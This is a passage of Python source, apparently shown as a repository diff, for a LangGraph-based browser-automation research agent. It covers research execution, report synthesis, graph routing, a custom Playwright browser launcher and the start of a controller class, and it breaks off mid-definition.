                    logger.info(f"Result from tool '{tool_name}': {str(tool_output)[:200]}...")
                    current_search_results.append(
                        {"tool_name": tool_name, "args": tool_args, "output": str(tool_output),
                         "status": "completed"})

                tool_results.append(ToolMessage(content=json.dumps(tool_output), tool_call_id=tool_call_id))

            except Exception as e:
                logger.error(f"Error executing tool '{tool_name}': {e}", exc_info=True)
                tool_results.append(
                    ToolMessage(content=f"Error executing tool {tool_name}: {e}", tool_call_id=tool_call_id))
                current_search_results.append(
                    {"tool_name": tool_name, "args": tool_args, "status": "failed", "error": str(e)})

        # Mark the task based on how the tool calls went.
        step_failed_tool_execution = any("Error:" in str(tr.content) for tr in tool_results)

        if step_failed_tool_execution:
            current_task["status"] = "failed"
            current_task[
                "result_summary"] = f"Tool execution failed. Errors: {[tr.content for tr in tool_results if 'Error' in str(tr.content)]}"
        elif executed_tool_names:  # If any tool was called
            current_task["status"] = "completed"
            current_task["result_summary"] = f"Executed tool(s): {', '.join(executed_tool_names)}."
        else:  # tool_calls structure present but empty
            current_task["status"] = "failed"
            current_task["result_summary"] = "LLM prepared for tool call but provided no tools."

        # Persist progress after every task.
        _save_plan_to_md(plan, output_dir)
        _save_search_results_to_json(current_search_results, output_dir)

        # Advance to the next task (wrapping into the next category).
        next_task_idx = task_idx + 1
        next_cat_idx = cat_idx
        if next_task_idx >= len(current_category["tasks"]):
            next_cat_idx += 1
            next_task_idx = 0

        updated_messages = state["messages"] + current_task_message_history + [ai_response] + tool_results

        return {
            "research_plan": plan,
            "search_results": current_search_results,
            "current_category_index": next_cat_idx,
            "current_task_index_in_category": next_task_idx,
            "messages": updated_messages,
        }

    except Exception as e:
        logger.error(f"Unhandled error during research execution for task '{current_task['task_description']}': {e}",
                     exc_info=True)
        current_task["status"] = "failed"
        _save_plan_to_md(plan, output_dir)
        # Determine next indices even on error to attempt to move on.
        next_task_idx = task_idx + 1
        next_cat_idx = cat_idx
        if next_task_idx >= len(current_category["tasks"]):
            next_cat_idx += 1
            next_task_idx = 0
        return {
            "research_plan": plan,
            "current_category_index": next_cat_idx,
            "current_task_index_in_category": next_task_idx,
            "error_message": f"Core Execution Error on task '{current_task['task_description']}': {e}",
            "messages": state["messages"] + current_task_message_history  # Preserve messages up to error
        }
|
| 824 |
+
|
| 825 |
+
|
| 826 |
+
async def synthesis_node(state: DeepResearchState) -> Dict[str, Any]:
    """Synthesizes the final report from the collected search results.

    Formats every collected finding plus the followed plan into a single
    prompt, asks the LLM for a Markdown report, saves it, and returns it as
    the "final_report" state update (or "error_message" on failure).
    """
    logger.info("--- Entering Synthesis Node ---")
    if state.get("stop_requested"):
        logger.info("Stop requested, skipping synthesis.")
        return {"stop_requested": True}

    llm = state["llm"]
    topic = state["topic"]
    search_results = state.get("search_results", [])
    output_dir = state["output_dir"]
    plan = state["research_plan"]  # Include plan for context

    if not search_results:
        logger.warning("No search results found to synthesize report.")
        report = f"# Research Report: {topic}\n\nNo information was gathered during the research process."
        _save_report_to_md(report, output_dir)
        return {"final_report": report}

    logger.info(
        f"Synthesizing report from {len(search_results)} collected search result entries."
    )

    # Format every collected finding for the prompt.
    formatted_results = ""
    for result_entry in search_results:
        query = result_entry.get("query", "Unknown Query")  # From parallel_browser_search
        tool_name = result_entry.get("tool_name")  # From other tools
        status = result_entry.get("status", "unknown")
        result_data = result_entry.get("result")  # From BrowserUseAgent's final_result
        tool_output_str = result_entry.get("output")  # From other tools

        # FIX: browser-search entries are the raw {"query", "result", "status"}
        # dicts extended into search_results and carry NO "tool_name" key, so the
        # old check `tool_name == "parallel_browser_search"` never matched and
        # completed web findings were silently dropped from the report. Detect
        # them by the presence of a completed "result" instead.
        if status == "completed" and result_data:
            formatted_results += f'### Finding from Web Search Query: "{query}"\n'
            formatted_results += f"- **Summary:**\n{result_data}\n"
            formatted_results += "---\n"
        elif tool_name and status == "completed" and tool_output_str:
            formatted_results += f'### Finding from Tool: "{tool_name}" (Args: {result_entry.get("args")})\n'
            formatted_results += f"- **Output:**\n{tool_output_str}\n"
            formatted_results += "---\n"
        elif status == "failed":
            error = result_entry.get("error")
            q_or_t = f"Query: \"{query}\"" if query != "Unknown Query" else f"Tool: \"{tool_name}\""
            formatted_results += f'### Failed {q_or_t}\n'
            formatted_results += f"- **Error:** {error}\n"
            formatted_results += "---\n"

    # Prepare the research plan context.
    plan_summary = "\nResearch Plan Followed:\n"
    for cat_idx, category in enumerate(plan):
        plan_summary += f"\n#### Category {cat_idx + 1}: {category['category_name']}\n"
        for task in category['tasks']:
            marker = "[x]" if task["status"] == "completed" else "[ ]" if task["status"] == "pending" else "[-]"
            plan_summary += f"  - {marker} {task['task_description']}\n"

    # FIX: the old code wrapped already-interpolated f-strings in a
    # ChatPromptTemplate and called format_prompt(); any literal braces inside
    # the findings (e.g. stringified dicts from tool outputs) would be
    # re-parsed as template variables and raise at format time. Build the
    # messages directly instead — the content is identical.
    system_content = """You are a professional researcher tasked with writing a comprehensive and well-structured report based on collected findings.
The report should address the research topic thoroughly, synthesizing the information gathered from various sources.
Structure the report logically:
1. Briefly introduce the topic and the report's scope (mentioning the research plan followed, including categories and tasks, is good).
2. Discuss the key findings, organizing them thematically, possibly aligning with the research categories. Analyze, compare, and contrast information.
3. Summarize the main points and offer concluding thoughts.

Ensure the tone is objective and professional.
If findings are contradictory or incomplete, acknowledge this.
"""
    human_content = f"""
**Research Topic:** {topic}

{plan_summary}

**Collected Findings:**
```
{formatted_results}
```

Please generate the final research report in Markdown format based **only** on the information above.
"""

    try:
        response = await llm.ainvoke(
            [
                SystemMessage(content=system_content),
                HumanMessage(content=human_content),
            ]
        )
        final_report_md = response.content
        # NOTE(review): the old version kept an always-empty `references` dict and
        # a dead "## References" appending block; removed as unreachable code.

        logger.info("Successfully synthesized the final report.")
        _save_report_to_md(final_report_md, output_dir)
        return {"final_report": final_report_md}

    except Exception as e:
        logger.error(f"Error during report synthesis: {e}", exc_info=True)
        return {"error_message": f"LLM Error during synthesis: {e}"}
|
| 948 |
+
|
| 949 |
+
|
| 950 |
+
# --- Langgraph Edges and Conditional Logic ---
|
| 951 |
+
|
| 952 |
+
|
| 953 |
+
def should_continue(state: DeepResearchState) -> str:
    """Conditional-edge predicate: pick the next graph node after an execution step.

    Returns one of the routing keys registered on the conditional edge:
    "end_run", "execute_research", or "synthesize_report".
    """
    logger.info("--- Evaluating Condition: Should Continue? ---")

    # A user-requested stop always wins over any other routing decision.
    if state.get("stop_requested"):
        logger.info("Stop requested, routing to END.")
        return "end_run"

    # A critical error raised inside a node short-circuits the run.
    err = state.get("error_message")
    if err and "Core Execution Error" in err:
        logger.warning(f"Critical error detected: {err}. Routing to END.")
        return "end_run"

    plan = state.get("research_plan")
    if not plan:
        logger.warning("No research plan found. Routing to END.")
        return "end_run"

    # Indices of the *next* task to check; the execution node itself skips
    # tasks that are already completed.
    cat_idx = state.get("current_category_index", 0)
    task_idx = state.get("current_task_index_in_category", 0)

    if cat_idx < len(plan):
        if task_idx < len(plan[cat_idx]["tasks"]):
            # A candidate task exists at (cat_idx, task_idx).
            logger.info(
                f"Plan has potential pending tasks (next up: Category {cat_idx}, Task {task_idx}). Routing to Research Execution."
            )
            return "execute_research"
        if cat_idx + 1 < len(plan):
            # Current category exhausted but another category remains; the
            # execution node advances the indices to the next category.
            logger.info(
                f"Finished tasks in category {cat_idx}. Moving to category {cat_idx + 1}. Routing to Research Execution."
            )
            return "execute_research"

    # Every category/task has been processed (or indices ran past the plan).
    logger.info("All plan categories and tasks processed or current indices are out of bounds. Routing to Synthesis.")
    return "synthesize_report"
|
| 992 |
+
|
| 993 |
+
|
| 994 |
+
# --- DeepSearchAgent Class ---
|
| 995 |
+
|
| 996 |
+
|
| 997 |
+
class DeepResearchAgent:
    """Orchestrates a multi-step research run: plan -> execute -> synthesize.

    Wraps a compiled Langgraph state machine and manages per-run resources
    (stop flag, browser tools, optional MCP client).
    """

    def __init__(
        self,
        llm: Any,
        browser_config: Dict[str, Any],
        mcp_server_config: Optional[Dict[str, Any]] = None,
    ):
        """
        Initializes the DeepSearchAgent.

        Args:
            llm: The Langchain compatible language model instance.
            browser_config: Configuration dictionary for the BrowserUseAgent tool.
                Example: {"headless": True, "window_width": 1280, ...}
            mcp_server_config: Optional configuration for the MCP client.
        """
        self.llm = llm
        self.browser_config = browser_config
        self.mcp_server_config = mcp_server_config
        self.mcp_client = None
        self.stopped = False
        self.graph = self._compile_graph()
        self.current_task_id: Optional[str] = None
        self.stop_event: Optional[threading.Event] = None
        self.runner: Optional[asyncio.Task] = None  # To hold the asyncio task for run

    async def _setup_tools(
        self, task_id: str, stop_event: threading.Event, max_parallel_browsers: int = 1
    ) -> List[Tool]:
        """Sets up the basic tools (File I/O), the browser search tool, and optional MCP tools.

        Returns:
            A list of tools, de-duplicated by tool name (last one wins).
        """
        tools = [
            WriteFileTool(),
            ReadFileTool(),
            ListDirectoryTool(),
        ]  # Basic file operations
        browser_use_tool = create_browser_search_tool(
            llm=self.llm,
            browser_config=self.browser_config,
            task_id=task_id,
            stop_event=stop_event,
            max_parallel_browsers=max_parallel_browsers,
        )
        tools += [browser_use_tool]
        # Add MCP tools if config is provided.
        # NOTE(fix): a previous `elif self.mcp_server_config:` fallback branch
        # was unreachable (identical condition to this `if`) and has been removed.
        if self.mcp_server_config:
            try:
                logger.info("Setting up MCP client and tools...")
                if not self.mcp_client:
                    self.mcp_client = await setup_mcp_client_and_tools(
                        self.mcp_server_config
                    )
                mcp_tools = self.mcp_client.get_tools()
                logger.info(f"Loaded {len(mcp_tools)} MCP tools.")
                tools.extend(mcp_tools)
            except Exception as e:
                # Best-effort: MCP tooling is optional, keep the core tools.
                logger.error(f"Failed to set up MCP tools: {e}", exc_info=True)
        tools_map = {tool.name: tool for tool in tools}
        # Fix: return an actual list as the annotation promises; dict.values()
        # is a view object, not a List[Tool].
        return list(tools_map.values())

    async def close_mcp_client(self):
        """Close the MCP client (if one was created) and drop the reference."""
        if self.mcp_client:
            await self.mcp_client.__aexit__(None, None, None)
            self.mcp_client = None

    def _compile_graph(self) -> StateGraph:
        """Compiles the Langgraph state machine."""
        workflow = StateGraph(DeepResearchState)

        # Add nodes
        workflow.add_node("plan_research", planning_node)
        workflow.add_node("execute_research", research_execution_node)
        workflow.add_node("synthesize_report", synthesis_node)
        workflow.add_node(
            "end_run", lambda state: logger.info("--- Reached End Run Node ---") or {}
        )  # Simple end node

        # Define edges
        workflow.set_entry_point("plan_research")

        workflow.add_edge(
            "plan_research", "execute_research"
        )  # Always execute after planning

        # Conditional edge after execution
        workflow.add_conditional_edges(
            "execute_research",
            should_continue,
            {
                "execute_research": "execute_research",  # Loop back if more steps
                "synthesize_report": "synthesize_report",  # Move to synthesis if done
                "end_run": "end_run",  # End if stop requested or error
            },
        )

        workflow.add_edge("synthesize_report", "end_run")  # End after synthesis

        app = workflow.compile()
        return app

    async def run(
        self,
        topic: str,
        task_id: Optional[str] = None,
        save_dir: str = "./tmp/deep_research",
        max_parallel_browsers: int = 1,
    ) -> Dict[str, Any]:
        """
        Starts the deep research process.

        Args:
            topic: The research topic.
            task_id: Optional existing task ID to resume. If None, a new ID is generated.
            save_dir: Directory under which per-task output folders are created.
                Must resolve inside ./tmp/deep_research; otherwise the default is used.
            max_parallel_browsers: Max concurrent browser agents for the search tool.

        Returns:
            A dict with "status", "message", "task_id" and "final_state".
        """
        if self.runner and not self.runner.done():
            logger.warning(
                "Agent is already running. Please stop the current task first."
            )
            # Return an error status instead of yielding
            return {
                "status": "error",
                "message": "Agent already running.",
                "task_id": self.current_task_id,
            }

        self.current_task_id = task_id if task_id else str(uuid.uuid4())
        safe_root_dir = "./tmp/deep_research"
        # Fix: resolve BOTH paths to absolute form before comparing. The old
        # check compared os.path.normpath(save_dir) (possibly relative) against
        # os.path.abspath(safe_root_dir), so every relative save_dir — including
        # the documented default — was flagged "unsafe". The os.sep suffix also
        # prevents a sibling like ".../deep_research_evil" from passing.
        safe_root = os.path.abspath(safe_root_dir)
        normalized_save_dir = os.path.abspath(os.path.normpath(save_dir))
        if normalized_save_dir != safe_root and not normalized_save_dir.startswith(
            safe_root + os.sep
        ):
            logger.warning(f"Unsafe save_dir detected: {save_dir}. Using default directory.")
            normalized_save_dir = safe_root
        output_dir = os.path.join(normalized_save_dir, self.current_task_id)
        os.makedirs(output_dir, exist_ok=True)

        logger.info(
            f"[AsyncGen] Starting research task ID: {self.current_task_id} for topic: '{topic}'"
        )
        logger.info(f"[AsyncGen] Output directory: {output_dir}")

        self.stop_event = threading.Event()
        _AGENT_STOP_FLAGS[self.current_task_id] = self.stop_event
        agent_tools = await self._setup_tools(
            self.current_task_id, self.stop_event, max_parallel_browsers
        )
        initial_state: DeepResearchState = {
            "task_id": self.current_task_id,
            "topic": topic,
            "research_plan": [],
            "search_results": [],
            "messages": [],
            "llm": self.llm,
            "tools": agent_tools,
            "output_dir": Path(output_dir),
            "browser_config": self.browser_config,
            "final_report": None,
            "current_category_index": 0,
            "current_task_index_in_category": 0,
            "stop_requested": False,
            "error_message": None,
        }

        if task_id:
            logger.info(f"Attempting to resume task {task_id}...")
            loaded_state = _load_previous_state(task_id, output_dir)
            initial_state.update(loaded_state)
            if loaded_state.get("research_plan"):
                logger.info(
                    f"Resuming with {len(loaded_state['research_plan'])} plan categories "
                    f"and {len(loaded_state.get('search_results', []))} existing results. "
                    f"Next task: Cat {initial_state['current_category_index']}, Task {initial_state['current_task_index_in_category']}"
                )
                initial_state["topic"] = (
                    topic  # Allow overriding topic even when resuming? Or use stored topic? Let's use new one.
                )
            else:
                logger.warning(
                    f"Resume requested for {task_id}, but no previous plan found. Starting fresh."
                )

        # --- Execute Graph using ainvoke ---
        final_state = None
        status = "unknown"
        message = None
        try:
            logger.info(f"Invoking graph execution for task {self.current_task_id}...")
            self.runner = asyncio.create_task(self.graph.ainvoke(initial_state))
            final_state = await self.runner
            logger.info(f"Graph execution finished for task {self.current_task_id}.")

            # Determine status based on final state
            if self.stop_event and self.stop_event.is_set():
                status = "stopped"
                message = "Research process was stopped by request."
                logger.info(message)
            elif final_state and final_state.get("error_message"):
                status = "error"
                message = final_state["error_message"]
                logger.error(f"Graph execution completed with error: {message}")
            elif final_state and final_state.get("final_report"):
                status = "completed"
                message = "Research process completed successfully."
                logger.info(message)
            else:
                # If it ends without error/report (e.g., empty plan, stopped before synthesis)
                status = "finished_incomplete"
                message = "Research process finished, but may be incomplete (no final report generated)."
                logger.warning(message)

        except asyncio.CancelledError:
            status = "cancelled"
            message = f"Agent run task cancelled for {self.current_task_id}."
            logger.info(message)
            # final_state will remain None or the state before cancellation if checkpointing was used
        except Exception as e:
            status = "error"
            message = f"Unhandled error during graph execution for {self.current_task_id}: {e}"
            logger.error(message, exc_info=True)
            # final_state will remain None or the state before the error
        finally:
            logger.info(f"Cleaning up resources for task {self.current_task_id}")
            task_id_to_clean = self.current_task_id

            self.stop_event = None
            self.current_task_id = None
            self.runner = None  # Mark runner as finished
            if self.mcp_client:
                await self.mcp_client.__aexit__(None, None, None)

        # Return a result dictionary including the status and the final state if available
        return {
            "status": status,
            "message": message,
            "task_id": task_id_to_clean,  # Use the stored task_id
            "final_state": final_state
            if final_state
            else {},  # Return the final state dict
        }

    async def _stop_lingering_browsers(self, task_id):
        """Attempts to stop any BrowserUseAgent instances associated with the task_id."""
        keys_to_stop = [
            key for key in _BROWSER_AGENT_INSTANCES if key.startswith(f"{task_id}_")
        ]
        if not keys_to_stop:
            return

        logger.warning(
            f"Found {len(keys_to_stop)} potentially lingering browser agents for task {task_id}. Attempting stop..."
        )
        for key in keys_to_stop:
            agent_instance = _BROWSER_AGENT_INSTANCES.get(key)
            try:
                if agent_instance:
                    # Assuming BU agent has an async stop method
                    await agent_instance.stop()
                    logger.info(f"Called stop() on browser agent instance {key}")
            except Exception as e:
                logger.error(
                    f"Error calling stop() on browser agent instance {key}: {e}"
                )

    async def stop(self):
        """Signals the currently running agent task to stop."""
        if not self.current_task_id or not self.stop_event:
            logger.info("No agent task is currently running.")
            return

        logger.info(f"Stop requested for task ID: {self.current_task_id}")
        self.stop_event.set()  # Signal the stop event
        self.stopped = True
        await self._stop_lingering_browsers(self.current_task_id)

    def close(self):
        # Resets the stopped flag so the agent can be reused for another run.
        # NOTE(review): this does NOT release the MCP client; callers should
        # also await close_mcp_client() if one was created.
        self.stopped = False
|
src/browser/__init__.py
ADDED
|
File without changes
|
src/browser/custom_browser.py
ADDED
|
@@ -0,0 +1,120 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Custom Browser
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Custom browser implementation with enhanced automation capabilities.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import pdb
|
| 14 |
+
|
| 15 |
+
from playwright.async_api import Browser as PlaywrightBrowser
|
| 16 |
+
from playwright.async_api import (
|
| 17 |
+
BrowserContext as PlaywrightBrowserContext,
|
| 18 |
+
)
|
| 19 |
+
from playwright.async_api import (
|
| 20 |
+
Playwright,
|
| 21 |
+
async_playwright,
|
| 22 |
+
)
|
| 23 |
+
from browser_use.browser.browser import Browser, IN_DOCKER
|
| 24 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 25 |
+
from playwright.async_api import BrowserContext as PlaywrightBrowserContext
|
| 26 |
+
import logging
|
| 27 |
+
|
| 28 |
+
from browser_use.browser.chrome import (
|
| 29 |
+
CHROME_ARGS,
|
| 30 |
+
CHROME_DETERMINISTIC_RENDERING_ARGS,
|
| 31 |
+
CHROME_DISABLE_SECURITY_ARGS,
|
| 32 |
+
CHROME_DOCKER_ARGS,
|
| 33 |
+
CHROME_HEADLESS_ARGS,
|
| 34 |
+
)
|
| 35 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 36 |
+
from browser_use.browser.utils.screen_resolution import get_screen_resolution, get_window_adjustments
|
| 37 |
+
from browser_use.utils import time_execution_async
|
| 38 |
+
import socket
|
| 39 |
+
|
| 40 |
+
from .custom_context import CustomBrowserContext
|
| 41 |
+
|
| 42 |
+
logger = logging.getLogger(__name__)
|
| 43 |
+
|
| 44 |
+
|
| 45 |
+
class CustomBrowser(Browser):
    # Browser subclass that (a) wires new contexts to CustomBrowserContext and
    # (b) customizes the builtin browser launch: window geometry, Chrome arg
    # assembly, and remote-debugging-port conflict avoidance.

    async def new_context(self, config: BrowserContextConfig | None = None) -> CustomBrowserContext:
        """Create a browser context"""
        # Merge browser-level config with the per-context config; per-context
        # keys win because they are unpacked last.
        browser_config = self.config.model_dump() if self.config else {}
        context_config = config.model_dump() if config else {}
        merged_config = {**browser_config, **context_config}
        return CustomBrowserContext(config=BrowserContextConfig(**merged_config), browser=self)

    async def _setup_builtin_browser(self, playwright: Playwright) -> PlaywrightBrowser:
        """Sets up and returns a Playwright Browser instance with anti-detection measures."""
        assert self.config.browser_binary_path is None, 'browser_binary_path should be None if trying to use the builtin browsers'

        # Use the configured window size from new_context_config if available
        if (
            not self.config.headless
            and hasattr(self.config, 'new_context_config')
            and hasattr(self.config.new_context_config, 'window_width')
            and hasattr(self.config.new_context_config, 'window_height')
        ):
            # Headed + explicit window size configured: honor it.
            screen_size = {
                'width': self.config.new_context_config.window_width,
                'height': self.config.new_context_config.window_height,
            }
            offset_x, offset_y = get_window_adjustments()
        elif self.config.headless:
            # Headless: no real screen, use a fixed 1080p virtual size.
            screen_size = {'width': 1920, 'height': 1080}
            offset_x, offset_y = 0, 0
        else:
            # Headed without explicit size: fall back to the physical screen.
            screen_size = get_screen_resolution()
            offset_x, offset_y = get_window_adjustments()

        # Built as a set, so duplicate flags (e.g. repeated extra_browser_args)
        # are de-duplicated before being passed to launch().
        chrome_args = {
            f'--remote-debugging-port={self.config.chrome_remote_debugging_port}',
            *CHROME_ARGS,
            *(CHROME_DOCKER_ARGS if IN_DOCKER else []),
            *(CHROME_HEADLESS_ARGS if self.config.headless else []),
            *(CHROME_DISABLE_SECURITY_ARGS if self.config.disable_security else []),
            *(CHROME_DETERMINISTIC_RENDERING_ARGS if self.config.deterministic_rendering else []),
            f'--window-position={offset_x},{offset_y}',
            f'--window-size={screen_size["width"]},{screen_size["height"]}',
            *self.config.extra_browser_args,
        }

        # check if chrome remote debugging port is already taken,
        # if so remove the remote-debugging-port arg to prevent conflicts
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            if s.connect_ex(('localhost', self.config.chrome_remote_debugging_port)) == 0:
                chrome_args.remove(f'--remote-debugging-port={self.config.chrome_remote_debugging_port}')

        # Per-engine argument lists; firefox/webkit also use set-unpacking to
        # de-duplicate against extra_browser_args.
        browser_class = getattr(playwright, self.config.browser_class)
        args = {
            'chromium': list(chrome_args),
            'firefox': [
                *{
                    '-no-remote',
                    *self.config.extra_browser_args,
                }
            ],
            'webkit': [
                *{
                    '--no-startup-window',
                    *self.config.extra_browser_args,
                }
            ],
        }

        # NOTE(review): channel='chromium' is passed regardless of
        # self.config.browser_class (see the linked Playwright issue for the
        # chromium rationale) — confirm firefox/webkit launches tolerate it.
        browser = await browser_class.launch(
            channel='chromium',  # https://github.com/microsoft/playwright/issues/33566
            headless=self.config.headless,
            args=args[self.config.browser_class],
            proxy=self.config.proxy.model_dump() if self.config.proxy else None,
            handle_sigterm=False,
            handle_sigint=False,
        )
        return browser
|
src/browser/custom_context.py
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Custom Browser Context
|
| 3 |
+
=================================================================
|
| 4 |
+
|
| 5 |
+
Custom browser context implementation with enhanced automation capabilities.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import json
|
| 13 |
+
import logging
|
| 14 |
+
import os
|
| 15 |
+
|
| 16 |
+
from browser_use.browser.browser import Browser, IN_DOCKER
|
| 17 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 18 |
+
from playwright.async_api import Browser as PlaywrightBrowser
|
| 19 |
+
from playwright.async_api import BrowserContext as PlaywrightBrowserContext
|
| 20 |
+
from typing import Optional
|
| 21 |
+
from browser_use.browser.context import BrowserContextState
|
| 22 |
+
|
| 23 |
+
logger = logging.getLogger(__name__)
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
class CustomBrowserContext(BrowserContext):
    """Browser context wrapper.

    Currently a pure pass-through to BrowserContext; exists as the extension
    point for context-level customizations.
    """

    def __init__(
        self,
        browser: 'Browser',
        config: BrowserContextConfig | None = None,
        state: Optional[BrowserContextState] = None,
    ):
        # Zero-argument super() is equivalent to the explicit
        # super(CustomBrowserContext, self) spelling.
        super().__init__(browser=browser, config=config, state=state)
|
src/controller/__init__.py
ADDED
|
File without changes
|
src/controller/custom_controller.py
ADDED
|
@@ -0,0 +1,193 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Custom Controller
|
| 3 |
+
============================================================
|
| 4 |
+
|
| 5 |
+
Custom browser controller with enhanced automation capabilities.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import pdb
|
| 13 |
+
|
| 14 |
+
import pyperclip
|
| 15 |
+
from typing import Optional, Type, Callable, Dict, Any, Union, Awaitable, TypeVar
|
| 16 |
+
from pydantic import BaseModel
|
| 17 |
+
from browser_use.agent.views import ActionResult
|
| 18 |
+
from browser_use.browser.context import BrowserContext
|
| 19 |
+
from browser_use.controller.service import Controller, DoneAction
|
| 20 |
+
from browser_use.controller.registry.service import Registry, RegisteredAction
|
| 21 |
+
from main_content_extractor import MainContentExtractor
|
| 22 |
+
from browser_use.controller.views import (
|
| 23 |
+
ClickElementAction,
|
| 24 |
+
DoneAction,
|
| 25 |
+
ExtractPageContentAction,
|
| 26 |
+
GoToUrlAction,
|
| 27 |
+
InputTextAction,
|
| 28 |
+
OpenTabAction,
|
| 29 |
+
ScrollAction,
|
| 30 |
+
SearchGoogleAction,
|
| 31 |
+
SendKeysAction,
|
| 32 |
+
SwitchTabAction,
|
| 33 |
+
)
|
| 34 |
+
import logging
|
| 35 |
+
import inspect
|
| 36 |
+
import asyncio
|
| 37 |
+
import os
|
| 38 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 39 |
+
from browser_use.agent.views import ActionModel, ActionResult
|
| 40 |
+
|
| 41 |
+
from src.utils.mcp_client import create_tool_param_model, setup_mcp_client_and_tools
|
| 42 |
+
|
| 43 |
+
from browser_use.utils import time_execution_sync
|
| 44 |
+
|
| 45 |
+
logger = logging.getLogger(__name__)
|
| 46 |
+
|
| 47 |
+
Context = TypeVar('Context')
|
| 48 |
+
|
| 49 |
+
|
| 50 |
+
class CustomController(Controller):
|
| 51 |
+
def __init__(self, exclude_actions: list[str] = [],
|
| 52 |
+
output_model: Optional[Type[BaseModel]] = None,
|
| 53 |
+
ask_assistant_callback: Optional[Union[Callable[[str, BrowserContext], Dict[str, Any]], Callable[
|
| 54 |
+
